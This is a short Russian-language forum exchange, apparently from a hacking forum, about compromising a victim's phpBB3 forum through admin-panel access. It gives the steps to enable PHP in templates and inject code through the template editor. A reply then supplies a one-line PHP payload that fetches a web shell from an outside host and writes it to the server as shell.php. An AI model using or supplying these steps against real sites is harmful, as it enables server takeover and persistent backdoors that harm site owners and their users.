вобщем есть форум жертвы с третим пхп, есть доступ в админ панель
методом
Цитата:
1) Вкладка общие --> Безопасность
Разрешить php в шаблонах: Да
2)Вкладка Стили --> Компоненты стилей ->> Шаблоны
С помощью встроенного редактора шаблонов выбираем файл и пишем в него:
Код:
<!-- PHP --> phpinfo(); <!-- ENDPHP -->
Далее применяем шаблон, идем на измененную страницу и видим наш php код
выводит данные сервера и тд, что можно сделать имея эти данные - я хз
залей шел.
через пхп.
<!-- PHP -->$url='http://sile.ru/shell.txt';file_put_contents('shell.php',file_get_ contents($url));<!-- ENDPHP -->
в переменную $url введи ссылку на txt код шела.